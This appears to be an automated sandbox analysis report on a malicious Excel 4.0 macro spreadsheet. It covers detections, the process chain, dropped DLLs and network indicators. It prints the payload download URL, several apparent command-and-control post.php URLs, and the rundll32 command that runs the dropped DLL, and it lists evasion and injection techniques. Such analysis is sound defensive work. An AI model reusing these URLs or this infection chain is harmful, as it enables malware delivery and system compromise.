Play interactive tour

Edit tour

Analysis Report case (166).xls

Overview

General Information

Sample Name:	case (166).xls
Analysis ID:	344660
MD5:	44b43922e08e0e8e1ec65300b3b1aa74
SHA1:	ec1a847009295036381af1b0a4383a61c3dcbb75
SHA256:	9b8516fcbe183de0a53ac47ea7f4289176e23fc82da1fe67c70cedc823f5dba6
Tags:	xls
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malicious Excel 4.0 Macro

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to inject code into remote processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Found malicious URLs in unpacked macro 4.0 sheet

Found obfuscated Excel 4.0 Macro

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected hidden Macro 4.0 in Excel

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the product ID of Windows

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1252 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2392 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2332 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

msiexec.exe (PID: 1616 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
case (166).xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1252, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2392

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: case (166).xls

Virustotal: Detection: 22%

Perma Link

Source: 5.2.msiexec.exe.90000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 4.2.rundll32.exe.840000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2161177103.0000000002990000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: scfrd[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 0000000Ah	4_2_0084D830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	4_2_00858830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then add esi, 02h	4_2_0085CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 00000000h	4_2_0085DA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 0000000Ah	5_2_0009D830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	5_2_000A8830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	5_2_000ACE40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	5_2_000ADA70

Source: global traffic

DNS query: name: rnollg.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

Networking:

Found malicious URLs in unpacked macro 4.0 sheet

Show sources

Source: before.1.0.0.sheet.csv_unpack

Macro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_00091AF0 InternetReadFile,

5_2_00091AF0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: rnollg.com

Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: Https://homesoapmolds.com/post.phpZ
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroo4
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot202n
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: msiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: A1EE0000.0.dr	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
Source: case (166).xls	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
Source: msiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/A
Source: msiexec.exe, 00000005.00000003.2165360506.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: https://gadgetswolf.com/post.php
Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/post.phpr
Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/post.phpx
Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/y
Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	String found in binary or memory: https://govemedico.tk/
Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	String found in binary or memory: https://govemedico.tk/O
Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	String found in binary or memory: https://govemedico.tk/post.php
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: https://homesoapmolds.com/
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: https://homesoapmolds.com/=
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: https://homesoapmolds.com/post.php
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: https://homesoapmolds.com/post.phpv
Source: msiexec.exe, 00000005.00000002.2354487031.0000000000468000.00000004.00000020.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: before.1.0.0.sheet.csv_unpack	String found in binary or memory: https://rnollg.com/kev/scfrd.dll
Source: case (166).xls, A1EE0000.0.dr	String found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: case (166).xls

Initial sample: URLDownloadToFileA

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content X E14 - "" jR V \ A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: case (166).xls	Initial sample: CALL
Source: case (166).xls	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: case (166).xls

Initial sample: Sheet size: 503434

Found obfuscated Excel 4.0 Macro

Show sources

Source: case (166).xls

Initial sample: High usage of CHAR() function: 147

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00849C60	4_2_00849C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00843A30	4_2_00843A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00849A60	4_2_00849A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0085DA70	4_2_0085DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00855BF0	4_2_00855BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0090F8FD	4_2_0090F8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0090D806	4_2_0090D806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0090D2C4	4_2_0090D2C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0090BB6E	4_2_0090BB6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0090DD48	4_2_0090DD48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00099C60	5_2_00099C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00093A30	5_2_00093A30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00099A60	5_2_00099A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000ADA70	5_2_000ADA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000A5BF0	5_2_000A5BF0

Source: egwih.dll.5.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.expl.evad.winXLS@7/12@4/4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000A9C90 AdjustTokenPrivileges,

5_2_000A9C90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_008569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_008569A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\A1EE0000

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD4BC.tmp

Jump to behavior

Source: case (166).xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer

Source: case (166).xls

Virustotal: Detection: 22%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2161177103.0000000002990000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

Source: case (166).xls

Initial sample: OLE summary lastprinted = 2021-01-26 16:17:13

Source: case (166).xls

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0084D830 LoadLibraryA,GetProcAddress,

4_2_0084D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0086D1F2 push dword ptr [ecx]; iretd	4_2_0086D1F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0086E9FA push esi; retf	4_2_0086EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_008682EB push eax; ret	4_2_0086834A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0086EA51 push esi; retf	4_2_0086EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00869A5D push ebp; iretd	4_2_00869AEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_009093ED push ecx; ret	4_2_00909400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0086B56F push esp; ret	4_2_0086B581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0086B700 push ss; ret	4_2_0086B735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00922B73 push esi; ret	4_2_00922B75

Persistence and Installation Behavior:

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Ywmiu\egwih.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\formnet.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
